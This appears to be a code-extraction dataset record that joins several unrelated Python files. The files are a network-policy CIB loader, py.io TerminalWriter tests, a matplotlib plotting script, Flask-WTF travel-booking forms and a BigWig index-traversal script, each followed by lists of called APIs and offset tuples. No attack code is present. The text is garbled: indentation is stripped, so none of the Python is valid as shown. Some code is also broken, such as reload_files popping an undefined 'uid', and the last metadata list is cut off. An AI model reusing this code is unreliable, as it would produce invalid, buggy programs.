def reload_files(self, cib_dir=None):
"""
Reload CIB files when a change is detected on disk
"""
if not cib_dir:
cib_dir = self.cib_dir
full_names = set()
logging.info("checking for CIB updates...")
if not os.path.exists(cib_dir):
sys.exit('CIB directory %s does not exist' % cib_dir)
for dirpath, dirnames, filenames in os.walk(cib_dir):
for filename in filenames:
if not filename.endswith(CIB.CIB_EXTENSIONS) or filename.startswith(('.', '#')):
continue
full_name = os.path.join(dirpath, filename)
stat = os.stat(full_name)
full_names.add(full_name)
if full_name in self.files:
if self.files[full_name] != stat.st_mtime_ns:
logging.info("CIB node %s has changed", full_name)
self.files[full_name] = stat.st_mtime_ns
self.load_cib_file(full_name)
else:
logging.info("Loading new CIB node %s.", full_name)
self.files[full_name] = stat.st_mtime_ns
self.load_cib_file(full_name)
removed_files = self.files.keys() - full_names
for filename in removed_files:
logging.info("CIB node %s has been removed", filename)
del self.files[filename]
deleted_cs = [cs for cs in self.nodes.values() if cs.filename == filename]
# remove corresponding CIBNode object
for cs in deleted_cs:
self.nodes.pop(uid, None)
self.update_graph()
def load_cib_file(self, filename):
cs = load_json(filename)
if not cs:
logging.warning("CIB node file %s was invalid" % filename)
return
try:
cib_node = CIBNode(cs)
except CIBEntryError as e:
if CIB_EXPIRED in e.args:
logging.debug("Ignoring CIB node %s: %s" % (filename, e.args[0]))
return
logging.error("Unable to load CIB node %s: %s" % (filename, e.args[0]))
return
cib_node.filename = filename
self.register(cib_node)
def update_graph(self):
# FIXME this tree should be rebuilt dynamically
# update links for all registered CIBs
for cs in self.nodes.values():
cs.update_links_from_match()
# FIXME check for invalid pointers
self.graph = {}
for i in self.nodes.values():
if not i.link:
continue
for r in i.linked:
if r not in self.graph:
self.graph[r] = []
if i.uid not in self.graph[r]:
self.graph[r].append(i.uid)
def import_json(self, slim, uid=None):
"""
Import JSON formatted CIB entries into current cib.
"""
# TODO optimize
try:
json_slim = json.loads(slim)
except json.decoder.JSONDecodeError:
logging.warning('invalid CIB file format')
return
# check if we received multiple objects in a list
if isinstance(json_slim, list):
for c in json_slim:
self.import_json(json.dumps(c))
return
# convert to CIB node object to do sanity check
try:
cs = CIBNode(json_slim)
except CIBEntryError as e:
print(e)
return
# no not import cache nodes if disabled
if not PM.CIB_CACHE and any(['__cached' in p for p in cs.properties.expand()]):
logging.debug('Ignoring cache CIB node')
return
if uid is not None:
cs.uid = uid
filename = cs.uid
slim = cs.json()
if not filename:
logging.warning("CIB entry has no UID")
# generate CIB filename
filename = hashlib.md5(slim.encode('utf-8')).hexdigest()
filename = '%s.cib' % filename.lower()
with open(os.path.join(self.cib_dir, '%s' % filename), 'w') as f:
f.write(slim)
logging.debug("CIB entry saved as \"%s\"." % filename)
self.reload_files()
def register(self, cib_node):
if cib_node in self.nodes:
logging.debug("overwriting existing CIB with uid %s" % cib_node.uid)
self.nodes[cib_node.uid] = cib_node
def unregister(self, cib_uid):
del self.nodes[cib_uid]
self.update_graph()
def remove(self, cib_uid):
self.unregister(cib_uid)
def lookup(self, input_properties, candidate_num=5):
"""CIB lookup logic implementation
Return CIB rows that include *all* required properties from the request PropertyArray
"""
assert isinstance(input_properties, PropertyArray)
candidates = [input_properties]
for e in self.rows:
try:
# FIXME better check whether all input properties are included in row - improve matching
# ignore optional properties in input request
required_pa = PropertyArray(
*(p for p in input_properties.values() if p.precedence == NEATProperty.IMMUTABLE))
if len(required_pa & e) != len(required_pa):
continue
except ImmutablePropertyError:
continue
try:
candidate = e + input_properties
candidate.cib_node = e.cib_node
candidates.append(candidate)
except ImmutablePropertyError:
pass
return sorted(candidates, key=operator.attrgetter('score'), reverse=True)[:candidate_num]
def dump(self, show_all=False):
print(term_separator("CIB START"))
# ============================================================================
for i, e in enumerate(self.rows):
print("%3i. %s" % (i, str(e)))
# ============================================================================
print(term_separator("CIB END"))
def __repr__(self):
return 'CIB<%d>' % (len(self.nodes))
if __name__ == "__main__":
cib = CIB('./cib/example/')
b = cib['B']
c = cib['C']
cib.dump()
import code
code.interact(local=locals(), banner='CIB')
for uid in cib.roots:
z = cib[uid].resolve_links([])
print(z)
query = PropertyArray()
test_request_str = '{"MTU": {"value": [1500, Infinity]}, "low_latency": {"precedence": 2, "value": true}, "remote_ip": {"precedence": 2, "value": "10:54:1.23"}, "transport": {"value": "TCP"}}'
test = json.loads(test_request_str)
for k, v in test.items():
query.add(NEATProperty((k, v['value']), precedence=v.get('precedence', 1)))
candidates = cib.lookup(query)
for i in candidates:
print(i)
# print(i, i.cib_node, i.score)
| [
"operator.attrgetter",
"json.loads",
"copy.deepcopy",
"policy.term_separator",
"json.dumps",
"itertools.product",
"collections.ChainMap",
"policy.PropertyArray.from_dict",
"policy.PropertyMultiArray",
"bisect.bisect",
"policy.NEATProperty",
"time.time",
"json.load",
"policy.PropertyArray"
... | [((16694, 16709), 'policy.PropertyArray', 'PropertyArray', ([], {}), '()\n', (16707, 16709), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((16918, 16946), 'json.loads', 'json.loads', (['test_request_str'], {}), '(test_request_str)\n', (16928, 16946), False, 'import json\n'), ((481, 500), 'json.load', 'json.load', (['cib_file'], {}), '(cib_file)\n', (490, 500), False, 'import json\n'), ((1740, 1760), 'policy.PropertyMultiArray', 'PropertyMultiArray', ([], {}), '()\n', (1758, 1760), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((3703, 3742), 'json.dumps', 'json.dumps', (['d'], {'indent': '(0)', 'sort_keys': '(True)'}), '(d, indent=0, sort_keys=True)\n', (3713, 3742), False, 'import json\n'), ((4246, 4316), 'bisect.bisect', 'bisect.bisect', (['[self.cib[uid].priority for uid in path]', 'self.priority'], {}), '([self.cib[uid].priority for uid in path], self.priority)\n', (4259, 4316), False, 'import bisect\n'), ((6415, 6485), 'bisect.bisect', 'bisect.bisect', (['[self.cib[uid].priority for uid in path]', 'self.priority'], {}), '([self.cib[uid].priority for uid in path], self.priority)\n', (6428, 6485), False, 'import bisect\n'), ((7174, 7213), 'itertools.product', 'itertools.product', (['*expanded_properties'], {}), '(*expanded_properties)\n', (7191, 7213), False, 'import itertools\n'), ((13211, 13227), 'json.loads', 'json.loads', (['slim'], {}), '(slim)\n', (13221, 13227), False, 'import json\n'), ((16023, 16050), 'policy.term_separator', 'term_separator', (['"""CIB START"""'], {}), "('CIB START')\n", (16037, 16050), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((16325, 16350), 'policy.term_separator', 'term_separator', (['"""CIB END"""'], {}), "('CIB END')\n", (16339, 16350), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((2184, 2210), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['l'], {}), '(l)\n', (2207, 2210), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((3132, 3143), 'time.time', 'time.time', ([], {}), '()\n', (3141, 3143), False, 'import time\n'), ((3316, 3327), 'time.time', 'time.time', ([], {}), '()\n', (3325, 3327), False, 'import time\n'), ((7239, 7253), 'collections.ChainMap', 'ChainMap', (['*pas'], {}), '(*pas)\n', (7247, 7253), False, 'from collections import ChainMap\n'), ((1959, 1985), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['p'], {}), '(p)\n', (1982, 1985), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((13511, 13524), 'json.dumps', 'json.dumps', (['c'], {}), '(c)\n', (13521, 13524), False, 'import json\n'), ((15912, 15940), 'operator.attrgetter', 'operator.attrgetter', (['"""score"""'], {}), "('score')\n", (15931, 15940), False, 'import operator\n'), ((1863, 1890), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['ps'], {}), '(ps)\n', (1886, 1890), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((8361, 8381), 'copy.deepcopy', 'copy.deepcopy', (['entry'], {}), '(entry)\n', (8374, 8381), False, 'import copy\n'), ((8414, 8438), 'collections.ChainMap', 'ChainMap', (['pa', 'entry_copy'], {}), '(pa, entry_copy)\n', (8422, 8438), False, 'from collections import ChainMap\n'), ((5624, 5655), 'policy.NEATProperty', 'NEATProperty', (["('uid', node.uid)"], {}), "(('uid', node.uid))\n", (5636, 5655), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n')] |
import py
import os, sys
from py.__.io import terminalwriter
def skip_win32():
if sys.platform == 'win32':
py.test.skip('Not relevant on win32')
def test_terminalwriter_computes_width():
py.magic.patch(terminalwriter, 'get_terminal_width', lambda: 42)
try:
tw = py.io.TerminalWriter()
assert tw.fullwidth == 42
finally:
py.magic.revert(terminalwriter, 'get_terminal_width')
def test_terminalwriter_defaultwidth_80():
py.magic.patch(terminalwriter, '_getdimensions', lambda: 0/0)
try:
tw = py.io.TerminalWriter()
assert tw.fullwidth == int(os.environ.get('COLUMNS', 80)) -1
finally:
py.magic.revert(terminalwriter, '_getdimensions')
def test_terminalwriter_default_instantiation():
tw = py.io.TerminalWriter(stringio=True)
assert hasattr(tw, 'stringio')
class BaseTests:
def test_line(self):
tw = self.getwriter()
tw.line("hello")
l = self.getlines()
assert len(l) == 1
assert l[0] == "hello\n"
def test_sep_no_title(self):
tw = self.getwriter()
tw.sep("-", fullwidth=60)
l = self.getlines()
assert len(l) == 1
assert l[0] == "-" * 60 + "\n"
def test_sep_with_title(self):
tw = self.getwriter()
tw.sep("-", "hello", fullwidth=60)
l = self.getlines()
assert len(l) == 1
assert l[0] == "-" * 26 + " hello " + "-" * 27 + "\n"
def test__escaped(self):
skip_win32()
tw = self.getwriter()
text2 = tw._escaped("hello", (31))
assert text2.find("hello") != -1
def test_markup(self):
skip_win32()
tw = self.getwriter()
for bold in (True, False):
for color in ("red", "green"):
text2 = tw.markup("hello", **{color: True, 'bold': bold})
assert text2.find("hello") != -1
py.test.raises(ValueError, "tw.markup('x', wronkw=3)")
py.test.raises(ValueError, "tw.markup('x', wronkw=0)")
def test_line_write_markup(self):
tw = self.getwriter()
tw.hasmarkup = True
tw.line("x", bold=True)
tw.write("x\n", red=True)
l = self.getlines()
skip_win32()
assert len(l[0]) > 2, l
assert len(l[1]) > 2, l
def test_attr_fullwidth(self):
tw = self.getwriter()
tw.sep("-", "hello", fullwidth=70)
tw.fullwidth = 70
tw.sep("-", "hello")
l = self.getlines()
assert len(l[0]) == len(l[1])
class TestStringIO(BaseTests):
def getwriter(self):
self.tw = py.io.TerminalWriter(stringio=True)
return self.tw
def getlines(self):
io = self.tw.stringio
io.seek(0)
return io.readlines()
class TestCallableFile(BaseTests):
def getwriter(self):
self.writes = []
return py.io.TerminalWriter(self.writes.append)
def getlines(self):
io = py.std.cStringIO.StringIO()
io.write("".join(self.writes))
io.seek(0)
return io.readlines()
def test_attr_hasmarkup():
tw = py.io.TerminalWriter(stringio=True)
assert not tw.hasmarkup
tw.hasmarkup = True
tw.line("hello", bold=True)
s = tw.stringio.getvalue()
assert len(s) > len("hello")
| [
"py.std.cStringIO.StringIO",
"py.test.raises",
"os.environ.get",
"py.magic.revert",
"py.magic.patch",
"py.io.TerminalWriter",
"py.test.skip"
] | [((206, 271), 'py.magic.patch', 'py.magic.patch', (['terminalwriter', '"""get_terminal_width"""', '(lambda : 42)'], {}), "(terminalwriter, 'get_terminal_width', lambda : 42)\n", (220, 271), False, 'import py\n'), ((484, 548), 'py.magic.patch', 'py.magic.patch', (['terminalwriter', '"""_getdimensions"""', '(lambda : 0 / 0)'], {}), "(terminalwriter, '_getdimensions', lambda : 0 / 0)\n", (498, 548), False, 'import py\n'), ((814, 849), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (834, 849), False, 'import py\n'), ((3146, 3181), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (3166, 3181), False, 'import py\n'), ((121, 158), 'py.test.skip', 'py.test.skip', (['"""Not relevant on win32"""'], {}), "('Not relevant on win32')\n", (133, 158), False, 'import py\n'), ((293, 315), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {}), '()\n', (313, 315), False, 'import py\n'), ((382, 435), 'py.magic.revert', 'py.magic.revert', (['terminalwriter', '"""get_terminal_width"""'], {}), "(terminalwriter, 'get_terminal_width')\n", (397, 435), False, 'import py\n'), ((568, 590), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {}), '()\n', (588, 590), False, 'import py\n'), ((692, 741), 'py.magic.revert', 'py.magic.revert', (['terminalwriter', '"""_getdimensions"""'], {}), "(terminalwriter, '_getdimensions')\n", (707, 741), False, 'import py\n'), ((1948, 2002), 'py.test.raises', 'py.test.raises', (['ValueError', '"""tw.markup(\'x\', wronkw=3)"""'], {}), '(ValueError, "tw.markup(\'x\', wronkw=3)")\n', (1962, 2002), False, 'import py\n'), ((2011, 2065), 'py.test.raises', 'py.test.raises', (['ValueError', '"""tw.markup(\'x\', wronkw=0)"""'], {}), '(ValueError, "tw.markup(\'x\', wronkw=0)")\n', (2025, 2065), False, 'import py\n'), ((2647, 2682), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (2667, 2682), False, 'import py\n'), ((2914, 2954), 'py.io.TerminalWriter', 'py.io.TerminalWriter', (['self.writes.append'], {}), '(self.writes.append)\n', (2934, 2954), False, 'import py\n'), ((2993, 3020), 'py.std.cStringIO.StringIO', 'py.std.cStringIO.StringIO', ([], {}), '()\n', (3018, 3020), False, 'import py\n'), ((628, 657), 'os.environ.get', 'os.environ.get', (['"""COLUMNS"""', '(80)'], {}), "('COLUMNS', 80)\n", (642, 657), False, 'import os, sys\n')] |
#!/usr/bin/python3
from sys import argv, stdin
from matplotlib import pyplot as plt
def main( argc, argv ):
exec, coords, x, y, radius = argv
x, y, radius = float( x ), float( y ), float( radius )
stdin = open( coords, 'r' )
X = []
Y = []
for line in stdin.readlines():
x, y = map( lambda v: float( v ), line.split( ', ', 2 ) )
X.append( x )
Y.append( y )
fig, ax = plt.subplots()
plt.plot( [ x ], [ y ], 'ro' )
circ = plt.Circle( ( x, y ), radius, color='r', fill=False )
ax.add_patch( circ )
plt.plot( X, Y, 'bo' )
plt.show()
if __name__ == '__main__':
try:
main( len( argv ), argv )
except KeyboardInterrupt:
print( 'successfully interrupted...' ) | [
"matplotlib.pyplot.Circle",
"matplotlib.pyplot.plot",
"sys.stdin.readlines",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((264, 281), 'sys.stdin.readlines', 'stdin.readlines', ([], {}), '()\n', (279, 281), False, 'from sys import argv, stdin\n'), ((399, 413), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (411, 413), True, 'from matplotlib import pyplot as plt\n'), ((416, 440), 'matplotlib.pyplot.plot', 'plt.plot', (['[x]', '[y]', '"""ro"""'], {}), "([x], [y], 'ro')\n", (424, 440), True, 'from matplotlib import pyplot as plt\n'), ((456, 505), 'matplotlib.pyplot.Circle', 'plt.Circle', (['(x, y)', 'radius'], {'color': '"""r"""', 'fill': '(False)'}), "((x, y), radius, color='r', fill=False)\n", (466, 505), True, 'from matplotlib import pyplot as plt\n'), ((535, 555), 'matplotlib.pyplot.plot', 'plt.plot', (['X', 'Y', '"""bo"""'], {}), "(X, Y, 'bo')\n", (543, 555), True, 'from matplotlib import pyplot as plt\n'), ((560, 570), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (568, 570), True, 'from matplotlib import pyplot as plt\n')] |
# -*- coding: utf-8 -*-
__author__ = 'fyabc'
from flask.ext.wtf import Form
from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField
from wtforms.validators import DataRequired, NumberRange, Length
# Local modules.
from config import TableNames
class SignInForm(Form):
userID = StringField('用户ID', validators=[DataRequired()])
userName = StringField('用户名', validators=[DataRequired()])
password = PasswordField(
'密码', validators=[DataRequired(), Length(min=6, message='密码长度不得少于6个字符。')])
submit = SubmitField('注册')
class QueryForm(Form):
type = SelectField('查询类型', coerce=str, choices=TableNames)
queryName = StringField('查询主键名称', default='')
submit = SubmitField('查询')
class LoginForm(Form):
userName = StringField('账号', validators=[DataRequired()])
password = PasswordField('密码', validators=[DataRequired()])
submit = SubmitField('登录')
myUserName = 'fyabc'
myPassword = '<PASSWORD>'
class ReserveForm(Form):
customerID = StringField('用户编号', validators=[DataRequired()])
reserveType = SelectField('预订类型', coerce=int,
choices=[
(1, '航班'),
(2, '宾馆'),
(3, '出租车')
])
reserveKey = StringField('预订名称', validators=[DataRequired()])
submit = SubmitField('预订')
class UnsubscribeForm(Form):
reservationID = IntegerField('预订编号', validators=[DataRequired()])
submit = SubmitField('退订')
class InsertForm(Form):
type = SelectField('插入类型', coerce=str, choices=[name for name in TableNames if name[0] != 'Reservations'])
primaryKey = StringField('主键名称', validators=[DataRequired()])
price = IntegerField('价格', validators=[NumberRange(min=1, max=524287)])
numTotal = IntegerField('数量', validators=[NumberRange(min=1, max=1023)])
password = StringField('密码')
fromCity = StringField('出发城市')
toCity = StringField('目的城市')
customerName = StringField('用户名称')
submit = SubmitField('插入记录')
class DeleteForm(Form):
type = SelectField('删除类型', coerce=str, choices=[name for name in TableNames])
primaryKey = StringField('主键名称', validators=[DataRequired()])
submit = SubmitField('删除记录')
class RouteQueryForm(Form):
fromCity = StringField('出发城市', validators=[DataRequired()])
toCity = StringField('目的城市', validators=[DataRequired()])
submit = SubmitField('查询线路')
class CustomerQueryForm(Form):
IDNumber = StringField('用户ID')
customerName = StringField('用户名称')
submit = SubmitField('查询用户')
| [
"wtforms.validators.NumberRange",
"wtforms.SubmitField",
"wtforms.StringField",
"wtforms.validators.Length",
"wtforms.SelectField",
"wtforms.validators.DataRequired"
] | [((555, 572), 'wtforms.SubmitField', 'SubmitField', (['"""注册"""'], {}), "('注册')\n", (566, 572), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((609, 660), 'wtforms.SelectField', 'SelectField', (['"""查询类型"""'], {'coerce': 'str', 'choices': 'TableNames'}), "('查询类型', coerce=str, choices=TableNames)\n", (620, 660), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((677, 710), 'wtforms.StringField', 'StringField', (['"""查询主键名称"""'], {'default': '""""""'}), "('查询主键名称', default='')\n", (688, 710), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((724, 741), 'wtforms.SubmitField', 'SubmitField', (['"""查询"""'], {}), "('查询')\n", (735, 741), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((906, 923), 'wtforms.SubmitField', 'SubmitField', (['"""登录"""'], {}), "('登录')\n", (917, 923), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1091, 1166), 'wtforms.SelectField', 'SelectField', (['"""预订类型"""'], {'coerce': 'int', 'choices': "[(1, '航班'), (2, '宾馆'), (3, '出租车')]"}), "('预订类型', coerce=int, choices=[(1, '航班'), (2, '宾馆'), (3, '出租车')])\n", (1102, 1166), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1410, 1427), 'wtforms.SubmitField', 'SubmitField', (['"""预订"""'], {}), "('预订')\n", (1421, 1427), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1542, 1559), 'wtforms.SubmitField', 'SubmitField', (['"""退订"""'], {}), "('退订')\n", (1553, 1559), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1597, 1701), 'wtforms.SelectField', 'SelectField', (['"""插入类型"""'], {'coerce': 'str', 'choices': "[name for name in TableNames if name[0] != 'Reservations']"}), "('插入类型', coerce=str, choices=[name for name in TableNames if \n name[0] != 'Reservations'])\n", (1608, 1701), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1931, 1948), 'wtforms.StringField', 'StringField', (['"""密码"""'], {}), "('密码')\n", (1942, 1948), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1964, 1983), 'wtforms.StringField', 'StringField', (['"""出发城市"""'], {}), "('出发城市')\n", (1975, 1983), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1997, 2016), 'wtforms.StringField', 'StringField', (['"""目的城市"""'], {}), "('目的城市')\n", (2008, 2016), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2036, 2055), 'wtforms.StringField', 'StringField', (['"""用户名称"""'], {}), "('用户名称')\n", (2047, 2055), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2069, 2088), 'wtforms.SubmitField', 'SubmitField', (['"""插入记录"""'], {}), "('插入记录')\n", (2080, 2088), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2126, 2196), 'wtforms.SelectField', 'SelectField', (['"""删除类型"""'], {'coerce': 'str', 'choices': '[name for name in TableNames]'}), "('删除类型', coerce=str, choices=[name for name in TableNames])\n", (2137, 2196), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2276, 2295), 'wtforms.SubmitField', 'SubmitField', (['"""删除记录"""'], {}), "('删除记录')\n", (2287, 2295), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2465, 2484), 'wtforms.SubmitField', 'SubmitField', (['"""查询线路"""'], {}), "('查询线路')\n", (2476, 2484), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2533, 2552), 'wtforms.StringField', 'StringField', (['"""用户ID"""'], {}), "('用户ID')\n", (2544, 2552), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2572, 2591), 'wtforms.StringField', 'StringField', (['"""用户名称"""'], {}), "('用户名称')\n", (2583, 2591), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2605, 2624), 'wtforms.SubmitField', 'SubmitField', (['"""查询用户"""'], {}), "('查询用户')\n", (2616, 2624), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((353, 367), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (365, 367), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((418, 432), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (430, 432), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((489, 503), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (501, 503), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((505, 543), 'wtforms.validators.Length', 'Length', ([], {'min': '(6)', 'message': '"""密码长度不得少于6个字符。"""'}), "(min=6, message='密码长度不得少于6个字符。')\n", (511, 543), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((816, 830), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (828, 830), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((880, 894), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (892, 894), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1064, 1078), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1076, 1078), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1388, 1402), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1400, 1402), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1520, 1534), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1532, 1534), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1754, 1768), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1766, 1768), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1810, 1840), 'wtforms.validators.NumberRange', 'NumberRange', ([], {'min': '(1)', 'max': '(524287)'}), '(min=1, max=524287)\n', (1821, 1840), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1889, 1917), 'wtforms.validators.NumberRange', 'NumberRange', ([], {'min': '(1)', 'max': '(1023)'}), '(min=1, max=1023)\n', (1900, 1917), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2254, 2268), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2266, 2268), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2381, 2395), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2393, 2395), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2443, 2457), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2455, 2457), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n')] |
import htmllistparse as ftp
from epivizfileserver.parser import BigWig
from joblib import Parallel, delayed
import struct
import pandas
import json
import pickle
url = "https://egg2.wustl.edu/roadmap/data/byFileType/signal/consolidated/macs2signal/foldChange/"
cwd, files = ftp.fetch_listing(url)
print("total files - ", len(files))
def get_file_index(file, baseurl):
print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
print("\t getting zoom headers")
bw.getZoomHeader()
print("\t get tree for full data offset")
tree = bw.getTree(-2)
bw.getId("chr1")
ofile = open("objects/" + file.name + ".pickle", 'wb')
pickle.dump(bw, ofile)
# ifile = "trees/" + file.name + ".fulltreeindex"
# print("\t writing index ", ifile)
# with open(ifile, "wb") as f:
# f.write(tree)
# This will download the index from all the files
Parallel(n_jobs = 10) (delayed(get_file_index)(file, url) for file in files)
def traverse_nodes(node, zoomlvl = -2, tree = None, result = [], fullIndexOffset = None, endian="="):
offset = node.get("rOffset")
if node.get("rIsLeaf"):
for i in range(0, node.get("rCount")):
data = tree[offset + (i * 32) : offset + ( (i+1) * 32 )]
(rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset, rDataSize) = struct.unpack(endian + "IIIIQQ", data)
result.append((rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset, rDataSize))
else:
for i in range(0, node.get("rCount")):
data = tree[offset + (i * 24) : offset + ( (i+1) * 24 )]
(rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset) = struct.unpack(endian + "IIIIQ", data)
# remove index offset since the stored binary starts from 0
diffOffset = fullIndexOffset
childNode = read_node(tree, rdataOffset - diffOffset, endian)
traverse_nodes(childNode, zoomlvl, result=result, tree = tree,
fullIndexOffset = fullIndexOffset, endian = endian)
return result
def read_node(tree, offset, endian="="):
data = tree[offset:offset + 4]
(rIsLeaf, rReserved, rCount) = struct.unpack(endian + "BBH", data)
return {"rIsLeaf": rIsLeaf, "rCount": rCount, "rOffset": offset + 4}
def traverse_tree(file, baseurl):
print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
print("\t getting headers")
findexOffset = bw.header.get("fullIndexOffset")
# bw.getZoomHeader()
ifile = "trees/" + file.name + ".fulltreeindex"
f = open(ifile, "rb")
# bw.tree[str(-2)] = f.read()
tree = f.read()
f.close()
# print(tree)
offset = 48
print("\t endian - ", bw.endian)
print("\t fullindexoffset - ", findexOffset)
root = read_node(tree, offset, endian = bw.endian)
# print("\t root - ", root)
records = traverse_nodes(root, -2, tree = tree, fullIndexOffset = findexOffset, endian = bw.endian)
pfile = "processed/" + file.name + ".leaves"
df = pandas.DataFrame(records, columns=["rStartChromIx", "rStartBase", "rEndChromIx", "rEndBase",
"rdataOffset", "rDataSize"])
df.to_csv(pfile, index=False)
# This will extract the leaf nodes from all the files
# Parallel(n_jobs = 10) (delayed(traverse_tree)(file, url) for file in files[1000:])
def get_file_chr(file, baseurl):
# print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
# print("\t getting zoom headers")
bw.getZoomHeader()
bw.getId("chr1")
# print("\t chrom tree")
return bw.chrmIds
# Parallel(n_jobs = 10) (delayed(get_file_chr)(file, url) for file in files)
# result = {}
# for file in files:
# print("processing file - ", file.name)
# result[file.name] = get_file_chr(file, url)
# with open("chrmids.json", "w") as f:
# f.write(json.dumps(result))
# def build_quadtree(file, baseurl, chrmid):
| [
"pickle.dump",
"epivizfileserver.parser.BigWig",
"htmllistparse.fetch_listing",
"joblib.Parallel",
"struct.unpack",
"pandas.DataFrame",
"joblib.delayed"
] | [((275, 297), 'htmllistparse.fetch_listing', 'ftp.fetch_listing', (['url'], {}), '(url)\n', (292, 297), True, 'import htmllistparse as ftp\n'), ((423, 450), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (429, 450), False, 'from epivizfileserver.parser import BigWig\n'), ((668, 690), 'pickle.dump', 'pickle.dump', (['bw', 'ofile'], {}), '(bw, ofile)\n', (679, 690), False, 'import pickle\n'), ((895, 914), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': '(10)'}), '(n_jobs=10)\n', (903, 914), False, 'from joblib import Parallel, delayed\n'), ((2198, 2233), 'struct.unpack', 'struct.unpack', (["(endian + 'BBH')", 'data'], {}), "(endian + 'BBH', data)\n", (2211, 2233), False, 'import struct\n'), ((2394, 2421), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (2400, 2421), False, 'from epivizfileserver.parser import BigWig\n'), ((3046, 3171), 'pandas.DataFrame', 'pandas.DataFrame', (['records'], {'columns': "['rStartChromIx', 'rStartBase', 'rEndChromIx', 'rEndBase', 'rdataOffset',\n 